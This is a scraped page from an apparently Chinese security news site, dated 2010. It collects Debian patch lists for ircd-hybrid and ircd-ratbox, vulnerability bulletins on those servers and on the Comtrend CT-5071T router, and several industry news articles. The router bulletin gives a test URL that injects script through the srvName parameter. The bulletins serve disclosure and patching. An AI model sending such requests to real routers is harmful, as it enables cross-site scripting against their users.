http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_s390.deb Size/MD5 checksum:   905196 cc484c7b4f807227ff75af729504ca0c http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_s390.deb Size/MD5 checksum:   537006 3c24b451ae8fdd846d982982fa652535 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_s390.deb Size/MD5 checksum:   616620 d9bba18dc19104a06d57403bf93e64a6 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_sparc.deb Size/MD5 checksum:   843350 99cd0379e8623f3265bbba3eb8578e86 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_sparc.deb Size/MD5 checksum:   586408 87cbcdd0fadac9c2d17c71cb5df907f7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_sparc.deb Size/MD5 checksum:   498376 a117209c1ed8b9104bee8a154d390fd0 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：    # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade IRCD-Hybrid ----------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://svn.ircd-hybrid.org:8000/viewcvs.cgi?rev=1044&view=rev ircd-ratbox ----------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.ircd-ratbox.org/download/ircd-ratbox-2.2.9.tar.bz2 IRCD,Hybrid,LINKS,下溢,漏洞 漏洞公告 admin 绿盟科技 2010-02-04 08:35 http://www.serversteam.com/S/Vuln/vuln_661.html 受影响系统： Comtrend CT-5071T 描述：BUGTRAQ ID: 38004 CVE(CAN) ID: CVE-2010-0470 康全电讯的CT-5071T是高性能的ADSL2+以太网路由器。 CT-5071T路由器没有正确地过滤提交给scvrtsrv.cmd的srvName参数便返回给了用户 受影响系统：     Comtrend CT-5071T 描述：BUGTRAQ  ID: 38004 CVE(CAN) ID: CVE-2010-0470 康全电讯的CT-5071T是高性能的ADSL2+以太网路由器。 CT-5071T路由器没有正确地过滤提交给scvrtsrv.cmd的srvName参数便返回给了用户，远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击，导致在用户浏览器会话中注入并执行任意HTML或脚本代码。 <*来源：Yoyahack     链接：http://secunia.com/advisories/38309/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://Serve/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1, 建议：厂商补丁： Comtrend -------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.comtrend.com 康全,电讯,CT-5071T,路由器,跨站,漏洞 漏洞公告 admin 未知 2010-02-04 08:34 http://www.serversteam.com/S/Vuln/vuln_660.html 受影响系统： ircd-ratbox ircd-ratbox 2.x 不受影响系统： ircd-ratbox ircd-ratbox 2.2.9 描述：BUGTRAQ ID: 37979 CVE ID: CVE-2010-0300 ircd-ratbox是全功能的ircd服务程序。 远程攻击者可以通过向ratbox IRC服务器发送特 受影响系统：     ircd-ratbox ircd-ratbox 2.x 不受影响系统：     ircd-ratbox ircd-ratbox 2.2.9 描述：BUGTRAQ  ID: 37979 CVE ID: CVE-2010-0300 ircd-ratbox是全功能的ircd服务程序。 远程攻击者可以通过向ratbox IRC服务器发送特制的HELP命令触发空指针引用，导致服务崩溃。 <*来源：Aaron Sethman （androsyn@ratbox.org）     链接：http://secunia.com/advisories/38210/         http://lists.ratbox.org/pipermail/ircd-ratbox/2010-January/000891.html         http://www.debian.org/security/2010/dsa-1980 *> 建议：厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1980-1）以及相应补丁: DSA-1980-1：integer underflow/denial of service 链接：http://www.debian.org/security/2010/dsa-1980 补丁下载： Source archives: http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1.dsc Size/MD5 checksum:     1139 a48d912892925013b37fb773841d6710 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2.orig.tar.gz Size/MD5 checksum:   756749 75896381ea6330aea860b35fff3c34bb http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1.diff.gz Size/MD5 checksum:   115007 a8d23129d0675ff779e5e315f8632a6b http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1.diff.gz Size/MD5 checksum:    18289 04a221b2b8dfd0654778a6608c7cb66b http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1.dsc Size/MD5 checksum:     1230 f79125aafcc5d9fcbd09bedadd69fce7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg.orig.tar.gz Size/MD5 checksum:   673439 0eb7d1430a997a37af03f8b2f9eed4bb Architecture independent packages: http://security.debian.org/pool/updates/main/i/ircd-hybrid/hybrid-dev_7.2.2.dfsg.2-4+lenny1_all.deb Size/MD5 checksum:    65708 85dba185f2fdd9e7b3c423ae8722cc2f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_alpha.deb Size/MD5 checksum:   568252 35a559f24895dab0fbe71f6af3a8c0b1 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_alpha.deb Size/MD5 checksum:   929788 583d32d5afc9747d824499183d4a5761 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_alpha.deb Size/MD5 checksum:   660008 1a2bca514133dbc27f91bca69ed2122e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_amd64.deb Size/MD5 checksum:   937710 2867b5535578c017699418acab7565b7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_amd64.deb Size/MD5 checksum:   542006 52ca320cdd28849bd65065c921f03623 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_amd64.deb Size/MD5 checksum:   634416 d320f0d1b77cb08cb0caa9c9644d13aa arm architecture (ARM) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_arm.deb Size/MD5 checksum:   589350 451a5bcf2b4b8f40e39128be3fdc479d armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_armel.deb Size/MD5 checksum:   894654 4daf0784d8865e75c378630d7cf2d870 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_armel.deb Size/MD5 checksum:   595420 bf40953d00dbccd069b1596b6c84eadc http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_armel.deb Size/MD5 checksum:   504238 785107a5a9fa3dcd88f2a12916d47092 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_hppa.deb Size/MD5 checksum:   908902 8e1ebf2baf27a71f008eba792cdd87d7 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_hppa.deb Size/MD5 checksum:   647938 c67f473e9b4ae77a5578359c76ff5e75 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_hppa.deb Size/MD5 checksum:   554656 00af4d733f43a8404b2e62718a4bd341 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_i386.deb Size/MD5 checksum:   591346 7a9ccd0273005c654f5e78d6ba9d29d6 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_i386.deb Size/MD5 checksum:   891002 796bbd22c352ec873c9705e560492dbe http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_i386.deb Size/MD5 checksum:   499796 24e0d7b1284b3d7c3688366e9a8c493e ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_ia64.deb Size/MD5 checksum:   783482 28568b727f452ef622cb8939618dde23 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_ia64.deb Size/MD5 checksum:   685370 17507ab3172ad5e1fd88ea05c70f68c4 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_ia64.deb Size/MD5 checksum:   906848 4561656a5c033c9b647f146a13e79322 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_mips.deb Size/MD5 checksum:   506502 854cd9c98a5eaf38e3f815fd79d20c9a http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_mips.deb Size/MD5 checksum:   918546 5307013e962c38b405db7507e251a31d http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_mips.deb Size/MD5 checksum:   601610 9fc6640bb08a3af295589b72f6667087 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_mipsel.deb Size/MD5 checksum:   912794 6024ad0383d9696c727203a0af740630 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_mipsel.deb Size/MD5 checksum:   504864 ac200b212ed5ed69095b90bba53558f3 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_mipsel.deb Size/MD5 checksum:   599656 f32d222728582a36d1a75494d87340af powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_powerpc.deb Size/MD5 checksum:   732146 445dc7f28c92455ed3293b9b6b795020 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_powerpc.deb Size/MD5 checksum:  1001328 bca90faf524223bb06bb47774ee7d147 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_powerpc.deb Size/MD5 checksum:   639750 282ee75ee6b2e2fefcda221fb930bc6b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_s390.deb Size/MD5 checksum:   905196 cc484c7b4f807227ff75af729504ca0c http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_s390.deb Size/MD5 checksum:   537006 3c24b451ae8fdd846d982982fa652535 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_s390.deb Size/MD5 checksum:   616620 d9bba18dc19104a06d57403bf93e64a6 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox-dbg_2.2.8.dfsg-2+lenny1_sparc.deb Size/MD5 checksum:   843350 99cd0379e8623f3265bbba3eb8578e86 http://security.debian.org/pool/updates/main/i/ircd-hybrid/ircd-hybrid_7.2.2.dfsg.2-4+lenny1_sparc.deb Size/MD5 checksum:   586408 87cbcdd0fadac9c2d17c71cb5df907f7 http://security.debian.org/pool/updates/main/i/ircd-ratbox/ircd-ratbox_2.2.8.dfsg-2+lenny1_sparc.deb Size/MD5 checksum:   498376 a117209c1ed8b9104bee8a154d390fd0 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：    # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade ircd-ratbox ----------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.ircd-ratbox.org/download/ircd-ratbox-2.2.9.tar.bz2 ircd,ratbox,HELP,拒绝服务 漏洞公告 admin 绿盟科技 2010-02-04 08:32 http://www.serversteam.com/S/News/news-20100130659.html 在谷歌、百度两大搜索引擎相继遭受攻击之后，微软的IE浏览器日前爆出最严重代号零日(Zero-Day)的漏洞，网络安全问题随即引起全世界的关注。市场分析机构纷纷看好网络安全市场，世界主要 在谷歌、百度两大搜索引擎相继遭受攻击之后，微软的IE浏览器日前爆出最严重代号零日(Zero-Day)的漏洞，网络安全问题随即引起全世界的关注。市场分析机构纷纷看好网络安全市场，世界主要网络安全软件厂商的股价出现普涨。 国家互联网应急中心运行部副主任周勇林表示，目前中国的互联网安全形势非常严峻,中国已成为网络攻击最大的受害国。那么，中国的网络安全产业的发展究竟如何呢? 免费模式存在争议 根据2009年中国互联网络信息中心(CNNIC)发布的《2008年中国网民信息网络安全状况研究报告》，影响着用户选择何种软件的主要因素是价格，七成以上的网民更愿用免费安全软件。从事网络安全咨询的林奇认为，360免费杀毒软件的出现是中国安全市场上的分水岭。2008年7月，360安全中心推出360杀毒测试版，以免费的方式搅乱了中国个人杀毒软件市场。原本作为行业老大的瑞星也不得不跟进，推出短期免费软件，就连各大全球软件巨头也不免俗。 来自艾瑞咨询的最新数据显示，截至2009年年底，360杀毒软件在杀毒行业占据30.8%的市场份额，用户量超过 1.2 亿。而此前推出的免费360安全卫士已经覆盖了国内73%网民，是安装量仅次于QQ的第二大客户端软件，用户数量接近2.8亿。 免费对传统行业是一种伤害，在互联网上却能创造一种新的商业模式。林奇表示，360的免费模式就像腾讯用免费的QQ那样培养用户的依赖度和忠诚度，基于这种黏性来提供相应的增值服务。面对中国逾70%的个人用户喜欢免费的安全软件，金山毒霸一名资深人士表示，价格战是众多网络安全服务提供商不得不采取的销售策略之一，但金山毒霸不会仅仅采用这一策略，“我们2010年会采取一个全新的商业模式，但因为现在时机尚不成熟，因此不便透露”。 赛门铁克中国安全响应中心经理白帆则向记者指出，免费更多是一种营销模式，用户会对此有不同选择。免费的软件在服务和技术上并没有那么全面，对于最新操作系统的支持和最新技术的更新，也不会那么快，比如对于64位操作系统的支持，对于微软服务器级操作系统的支持。白帆表示，一些小公司或许会用一些消费级产品，这样的选择会出现缺陷，也有企业开始用免费的软件，后来卸载了，再花钱买收费软件。 但是，从CNNIC的调查数据看，84%的网民不会因为“便宜没好货”而放弃使用免费杀毒软件，甚至对其表现出了相当的信任度。林奇也表示，据他所知，360研发能力并不弱。而奇虎360总裁齐向东就曾公开宣称：“业内专家级的安全高手我们拥有一半以上。” 不过白帆坚持认为，影响用户选择使用哪款软件的主要因素，除了价格，还有厂商的品牌以及售后服务，因此赛门铁克在中国市场仍然有很大机会。 “99%的全球500强企业在使用赛门铁克的产品，在各类测评中赛门铁克获奖最多，而且赛门铁克将每年收入的14%—15%投入到研发，每年都会推出十几项新技术。”白帆认为，用户是能感受到这样的实力的。 本土品牌占主流 目前国内网民中，96.1%的网民个人计算机中已安装有信息安全软件。当前国内个人安全软件市场中所销售的安全软件，其产品通常分为套装软件和非套装软件。金山毒霸的资深人士表示，就其以往的经验来看，中国用户更倾向于使用套装安全软件，因其安装起来简便、快捷。 CNNIC的数据也印证了这一点。在国内安全市场中，大部分网民选择使用安全套装软件产品，其比例高达70.5%。而这些使用安全套装软件的网民中，瑞星软件占据49.7%的市场份额，远高于其他品牌安全套装软件;其次是卡巴斯基和金山软件，分别占到17.2%和14.6%。虽然近两年，网上对于国外杀毒品牌的相关报道很多，但网民真正使用这些国外品牌的比例依然较低，与国内品牌市场占有率还有很大的距离。 在网民使用的非套装杀毒软件产品中，市场占有率最高的有瑞星和卡巴斯基，其比例分别为41.8%和30.8%;处于第二梯队的软件品牌是金山毒霸和360杀毒软件，其市场占有率分别为9.1%和8.1%。对使用非套装防火墙软件产品的网民调研时发现，瑞星防火墙和360防火墙软件分别占据了 35.8%和30.9%的市场份额;而微软Windows XP自带的防火墙，其市场占有率为12.7%。 但在使用辅助安全工具软件的网民中，360安全卫士无疑占据明显优势，市场占有率高达79.3%，而其他品牌市场占有率则均不超过10%。 白帆指出，在病毒、恶意软件增长速度上，中国和全球是一致的，不同的是用户习惯生成的恶意软件，比如国外使用Twitter、 Facebook、AOL，而国内更多在网游等娱乐方面，由于载体和传播方式不同，用户关注度也会不同。但就赛门铁克而言，是要覆盖全球绝大多数的用户需求，技术要求更全面，而不会只着眼于一两项技术。 　　外国厂商生存困难 在个人安全市场上，赛门铁克、迈克菲等普及率与其全球巨头的地位并不相称，在企业级安全市场上，它们同样面临着困境。林奇甚至用“相当困难”来向记者形容国外安全服务商进入中国企业级市场的状况。 不过白帆向记者强调，并没有感觉到赛门铁克在中国有什么劣势，在企业级安全市场上，赛门铁克无论是在研发还是管理上都具有很多优势，在中国面临的问题和在其他国家面临的并无二致，都是企业在所有生产国之外的地区都会碰到的法律法规等问题。 但据记者了解，早在2007年公安部就联合其他各部门印发了《信息安全等级保护管理办法》，而现在，对于金融和政府行业的信息安全评级几乎是强制性的，这其中蕴含的中国特色是国外企业无法领悟且无法去实施的。而金融和政府行业目前正是安全市场中的需求大户，这就给了国内企业唱主角的机会。 目前，安全产品的销售模式还是产品加服务，尽管三分技术七分管理的道理人尽皆知，但目前产品依然是企业愿意付钱的最重要理由，而服务的需求则只能用前景看好来形容，这也是在服务咨询上占有优势的国外企业目前难以发挥的原因。白帆打比方说：“企业在安全上的防护就相当于汽车安全带一样属于标配，而咨询服务的增值性就好比冬天建议车主使用雪地胎，可以帮助中国这些认识IT年限不长的企业进行更好的安全管理。”但他也承认，目前在安全咨询服务上更有优势的赛门铁克在中国市场上很多时候还是扮演一个教育者的角色。 “但是中国企业应该能感受到赛门铁克的诚意。”白帆说，赛门铁克目前对中国的投入已经非常大，比如赛门铁克在亚洲建立了四个安全响应中心，但只有中国这个是全球唯一一个单纯服务本国的中心。 网络安全,市场,漏洞,商机 行业资讯 admin 未知 2010-01-30 21:43 http://www.serversteam.com/S/News/news-20100130658.html 2010年新年伊始，层出不穷的事件接踵而来，人们似乎还来不及去缅怀已经逝去的零零年代和期冀已经到来的一零年代，注意力就不断的被转移。首先，在元旦假期里人们迎来了2010年的第一场雪 2010年新年伊始，层出不穷的事件接踵而来，人们似乎还来不及去缅怀已经逝去的零零年代和期冀已经到来的一零年代，注意力就不断的被转移。首先，在元旦假期里人们迎来了2010年的第一场雪，还来不及分享初雪的喜悦，各地就出现大风降温或暴风雪天气，同时各个地区也不断刷新着历史上的气象记录，这个冬天真的很冷!海地7.0级地震，遇难者控超10万人，同时地震区也发出了海啸预警。我想起2008年那个夏天，那个让所有中国人悲痛的5.12汶川大地震。甚至看过了电影《2012》的网友声称“2012会提早到来” 与此同时，互联网也不平静，2009年末一场手机扫黄，网络扫黄的网络整顿轰轰烈烈的展开，并持续至今;广电局查封BT下载网站，网站纷纷被关;而新年伊始，百度被黑了，谷歌也被传出要退出中国市场，现在的互联网真可谓热闹非凡。不管百度被黑也好，BT被封也罢，还是大规模的网络扫黄活动，折射出的都是网络环境中存在的安全问题，而这也给网络安全敲响了警钟。 现在大的网络环境下存在着诸多的不安全因素，而网络信息平台的运用，是现在几乎所有企业单位的必要装备。因此良好网络安全的防范意识和网络安全工具的使用，是每个企业单位网络信息平台安全运行的基本保障。而针对公司内部网络环境的安全管理，包括的员工的上网行为的管理都是可以通过必要的管理工具就可以实现的。如员工在上班时间下载视频、游戏，在线聊天视频，玩网络游戏、在线游戏，访问非法网站等上网行为，不光影响工作，同时也使公司网络流量加大，影响网速。 针对员工的上网行为，公司可利用上网行为管理软件对此进行管理，如大势至(北京)软件工程有限公司推出的聚生网管软件，这是一款功能强大网络管理软件，可针对不同的上网行为进行不同设置已达到不同的管理需求。 百度被黑事件折射出的网络安全问题，已成为人们关注的焦点，网络安全整治迫在眉睫，这是大环境下相关部门应该做的工作，企业在使用网络的工作过程中，也应作出相应的措施来保证自己网络环境的安全畅通。同时也应软硬结合，面对规模越来越庞大和复杂的网络，仅依靠传统的网络安全设备来保证网络层的安全和畅通已经不能满足现在的网络安全需求。 因此选择适合网络管理软件，严格控制终端网络使用行为，这为公司每部局域网的网络安全提供了有效保障。 百度,被黑,网络安全,思考 行业资讯 admin 未知 2010-01-30 21:42 http://www.serversteam.com/S/News/news-20100130657.html 据国外媒体报道，思科星期五发布了一种免费的iPhone网络安全软件SIO To Go。任何人使用这个软件都可以获得防御互联网上最新的木马程序、蠕虫或者其它威胁的措施。 这个应用程序将把思科安 据国外媒体报道，思科星期五发布了一种免费的iPhone网络安全软件“SIO To Go”。任何人使用这个软件都可以获得防御互联网上最新的木马程序、蠕虫或者其它威胁的措施。 这个应用程序将把思科安全智能操作（SIO）博客、博客、报警和最新的计算机安全信息传送到iPhone和iPod Touch设备。 思科安全产品统一营销经理Michael Weir对法新社说，在你的客户或者员工没有一直连接到网络的领域，我们要把思科安全提供到你们的手上。这个应用程序是为安全人员制作的。但是，这个应用程序也适用于那些对安全非常感兴趣的人们。 通过“SIO To Go”应用程序传送到iPhone的信息包括从对电子邮件和全球互联网通讯进行的分析中获得的最新的威胁。SIO数据包括对网站的评级，指出这些网站在垃圾邮件、病毒和其它麻烦方面等性能的可信任程度。 Weir说，我不愿意用许多时间阅读缓解威胁的安全公告。但是，我有情趣了解最新爆发的攻击和这些攻击的性质。 虽然企业在批准使用iPhone方面动作迟缓，但是，企业员工正在越来越多地在工作中使用苹果的这种智能手机。思科是提供专门为iPhone制作的安全软件的技术公司之一。 Weir说，企业批准的iPhone在企业中的应用将增长。我将看到有更多的用于iPhone的商业应用程序。 “SIO To Go”软件将通过苹果的在线应用程序商店提供。安全信息也将通过思科的cisco.com/go/sio网站提供。 思科,免费,iPhone,网络安全 行业资讯 admin 未知 2010-01-30 21:24 http://www.serversteam.com/S/News/news-20100130656.html 随着企业信息化规模的迅猛扩张，信息数据传输量呈爆炸式增长，信息数据的处理和传输的安全问题面临着诸多挑战。近日，凹凸网络科技推出了针对中小企业用户的Sifoworks G系列防火墙产品， 随着企业信息化规模的迅猛扩张，信息数据传输量呈爆炸式增长，信息数据的处理和传输的安全问题面临着诸多挑战。近日，凹凸网络科技推出了针对中小企业用户的Sifoworks G系列防火墙产品，不仅有效提升了对信息数据处理的能力，更为净化企业网络环境，保障信息安全提供了一体化的解决方案。 据介绍，Sifoworks G系列防火墙支持路由、透明盒混合三种部署方式，有很好的适应性，拥有5对千兆光电Combo接口和两个千兆电口，可以直接和企业出口的光纤连接，不但节约了用户光电转换器的成本，同时大大提高了可靠性。 与同等价位的防火墙产品相比，Sifoworks G系列防火墙在性能和VPN性能方面有明显优势。以Sifoworks G600为例，该款具有防范网络内部和外部的各种攻击，通过精细的流量管理，抑制网络风暴，以及丰富的应用层过滤功能，和多链路负载均衡和服务器负载均衡，防火墙性能更达到了4Gbps，有效增强了企业用户防护能力，同时采用独立通道实现IPSec VPN功能，解决了传统防火墙中VPN数据多次穿越总线的瓶颈，在这种情况下CPU只负责IKE的协商，从大计算量的VPN加解密中解放出来，从而提升整体性能。 此外，为了应对数据传播量的增长，Sifoworks G系列防火墙基于ASIC芯片开发了每IP限流功能，配合芯片级的QoS，可以形成三级的流量控制。而深受业界推崇的的GUI管理界面(可选多语言)，还可让企业的IT管理人员轻松应对复杂的安全威胁，集团用户更可以借助SifoView软件实现百台设备的集中监控和管理，极大地简化了繁琐的网络管理工作。 据悉，Sifoworks G系列防火墙在刚刚结束的《中国计算机报》年度评选中获得了编辑推荐奖，其在业界的受欢迎度可见一斑。 凹凸,防火墙,企业,网络安全,能力 行业资讯 admin 未知 2010-01-30 21:19 http://www.serversteam.com/S/News/news-20100130655.html 美军网络战司令部内景 来源：解放军报 美国《信号》杂志最新一期发表文章称，近年来，网络安全成为世界各国面临的一项非常严重的威胁，在科技领域始终走在世界最前端的美国亦不例外。 美军网络战司令部内景 来源：解放军报     美国《信号》杂志最新一期发表文章称，近年来，网络安全成为世界各国面临的一项非常严重的威胁，在科技领域始终走在世界最前端的美国亦不例外。为了有效应 对来自网络的安全威胁和随时可能出现的网络战，美国专家展开了激烈的讨论，美政府未来五年更是准备投入数百亿美元用于该领域技术设备的开发和采购。包括美 海军在内的美军方也在积极行动，开发新的系统以防范网络攻击。     文章指出，如今，美国面临的网络安全威胁日益严峻，而相比之下，自身的网络信息技术的发展却相对滞后。与 此同时，美国安全部门的行业标准等亦未能跟上形势的发展变化，已经落后于技术的发展脚步。而且，如今网络安全威胁涉及的范围正不断扩大，在整个太平洋地区 乃至全世界都产生了巨大的影响。去年11月2日至5日，美国有关专家在夏威夷檀香山召开了主题为“网络行动：跨国挑战”的会议，为期四天的会议围绕网络行 为和网络安全等问题进行了讨论。美国防信息系统局采购部门和国防信息技术承包组织负责人凯瑟琳—米勒表示，未来五年中美国花在网络安全方面的财政预算开支 有大幅增长，政府在该领域的财政支出将由2009年的79亿美元上升至2014年的117亿美元。这种年均8．1％的增长率实际已经是政府在信息科技方面 支出的两倍。     然而，仅靠花钱还无法完全解决目前网络安全方面所面临的种种难题。诺格公司信 息系统部分负责人、海军退役将领吉布—戈德温直言目前网络环境中面临着一些严峻挑战，“这就是战争，我们要面对的一支最为庞大的常备军”。他同时指出，美 国在网络安全上多花一美元，自然就要在国防其他领域少花一美元。不仅如此，由于网络安全问题总是根据实际威胁的变化进行针对性调整，处于守势的美国将永远 落后一步。由于网络安全威胁的性质不断发生变化，美国所面临的挑战也在不断更新，而且网络对面的对手正变得越来越聪明。戈德温指出，针对美国的网络攻击数 量不断增长，情况日趋复杂。2009年7月4日，全球74个国家17万台电脑加入针对美国的网络攻击之中，而每天新出现的代码有2800种之多。他认为， 为了提供有效的网络安全保护，美国的网络安全部门必须更为庞大、迅速和高效，然而不幸的是，现实状况却是网络安全部门的发展十分有限、缓慢且缺乏灵活性。     美国资深咨询机构博思艾伦的研究人员林恩—赫尔利指出，在网络安全问题上人们需 要开阔眼界，从更为广泛的角度来思考问题。例如，技术人员也要了解指挥和控制系统，因为所有问题都是相互关联的。网络安全工作人员自身也存在非常大的问 题。有关的定义和原则早就已经过时，需要根据现实情况进行修改。她指出，有的安全职务的职责定义还要追溯到上世纪80年代，雇佣人员的标准也是沿袭老一 套。在重新规划网络安全部队组成以及挑选工作人员等方面，政府都还有很多工作要做。通过采购来增强网络安全和信息技术能力面临着许多的障碍。美国政府IT 咨询公司Smartronix 执行副总裁罗伯特—谢伊表示，不同的部门和机构往往会各自开发不同的系统，但其水平和功能却十分类似。此外，还存在采购事务政治化的问题，有些不懂行的人 参与进来对整个程序造成了不良影响。     首席信息官集团负责人迈克尔—米尔福德指出，美国并非环太平洋地区众多国家中 唯一面对网络安全威胁的。他指出，采购方面的延误将成为美国在网络安全方面的致命弱点，发展更快而且更为灵活的对手在获得更好技术和能力方面的速度要远快 于美军方。此外，由于采购程序冗繁复杂，很多机构会绕过采购规则，这反过来又会导致采购失控并导致系统漏洞，从而给对手留下更多的可乘之机。米尔福德要求 进一步规范和公开网络安全活动，使之成为其他军事活动的一部分。他还介绍了澳大利亚在这方面所作出的种种努力。他指出，在过去几个月的时间里澳大利亚已经 做出了多项重要决定。首先，政府设立专门职位负责国防通信和信息技术。如果某部门负责人或指挥官希望获得设备，其采购请求需要经过单独的预算申请并遵循一 定标准。     不过，网络安全会议只是重点讨论了目前网络安全所需要的，却留下了许多待解的 实际问题。CACI国际公司高级副总裁扎尔麦—阿兹米表示，大多数时间都花在如何解决明天的问题上，却没人关心当前的问题。思科软件集团高级副总裁普罗科 特指出，应对网络风险应该树立创新意识。由于网络威胁是动态而不是静态的，因此需要在以创新为基础，寻求网络安全技术的结构性转变。     政府在网络安全方面的作用仍然是各方讨论的重要话题。科学应用国际公司网络项 目负责人罗伯特—吉斯勒呼吁政府建立新的网络安全体系。Qwest国际通讯公司政府服务部门高级副总裁戴安娜—戈温则提出，五角大楼应该进行信息共享，这 样一来，军方、企业以及联盟伙伴之间能够共同计划改进网络防御战略。所有类型的通信和网络系统都存在一定的脆弱性，而当所有人都连接到一个网络上时，都会 受到危险的影响。网络安全的挑战体现在网络战本身，有评估小组就此问题对美国的相关表现进行了评估。就评估结果来看，并不理想。美国在该领域的技术发展不 是已经落后就是被误导，而这一领域的重要性却正在急剧增加。美国第三舰队司令理查德—亨特中将指出，“没有比网络战更为重要的领域了。”随着网络运用日益 